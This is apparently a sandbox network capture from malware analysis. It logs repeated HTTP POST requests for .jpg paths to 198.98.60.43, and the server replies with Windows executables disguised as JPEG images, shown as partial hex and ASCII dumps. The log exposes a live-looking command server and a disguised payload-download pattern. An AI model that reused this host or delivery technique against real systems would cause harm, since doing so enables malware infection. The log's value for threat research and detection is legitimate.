                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 37 37 00 00 00 00 00 94 0b 00 00 00 c0 08 00 00 0c 00 00 00 46 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 39 00 00 00 00 00 04 05 00 00 00 d0 08 00 00 06 00 00 00 52 08 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=Sv?!X` 8 L'p.text`0`.data@@.rdata$@@@.bss@.edata@0@.idataL@0.CRT@0.tls @0.reloc'(@0B/4`0@@B/19@@B/35MP@B/51`C`D@B/638@B/77F@B/89R
                                                                May 4, 2021 21:35:14.466412067 CEST4309OUTPOST /2.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:14.595482111 CEST4310INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:14 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:00:58 GMT
                                                                ETag: "519d0-58aa824acda80"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 334288
                                                                Keep-Alive: timeout=5, max=98
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$/AVAVAVVAV]@WAV1VAV]BWAV]DWAV]EWAV@WAVO@WAV@VAVOBWAVOEWAVOAWAVOVAVOCWAVRichAVPELb["!f)ps@pP@xP0T@8.textt `.rdata@@.data,H@.rsrcx@@@.relocP@B
                                                                May 4, 2021 21:35:15.075830936 CEST4660OUTPOST /3.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:15.204968929 CEST4661INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:15 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:20 GMT
                                                                ETag: "217d0-58aa825fc8c00"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 137168
                                                                Keep-Alive: timeout=5, max=97
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U;;;;W;8;?;:;>;:;:w;?;>;;;;9;Rich;PEL_["!z@3@A@t, x0hTTh@l.textxz `.rdata^ef~@@.data@.didat8@.rsrcx @@.reloch0@B
                                                                May 4, 2021 21:35:15.255719900 CEST4805OUTPOST /4.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:15.383333921 CEST4806INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:15 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:30 GMT
                                                                ETag: "6b738-58aa826952280"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 440120
                                                                Keep-Alive: timeout=5, max=96
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AV5=A;";;;;;;-;RichPEL8'Y"!P az@ACR,x8?4:f8(@P@@.textr `.data( @.idata6P @@.didat4p6@.rsrc8@@.reloc4:<<@B
                                                                May 4, 2021 21:35:15.994914055 CEST5291OUTPOST /5.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:16.123927116 CEST5316INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:16 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:44 GMT
                                                                ETag: "1303d0-58aa8276ac200"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1246160
                                                                Keep-Alive: timeout=5, max=95
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@B
                                                                May 4, 2021 21:35:20.831506014 CEST6674OUTPOST /7.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:20.959001064 CEST6676INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:20 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:02:02 GMT
                                                                ETag: "14748-58aa8287d6a80"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 83784
                                                                Keep-Alive: timeout=5, max=94
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
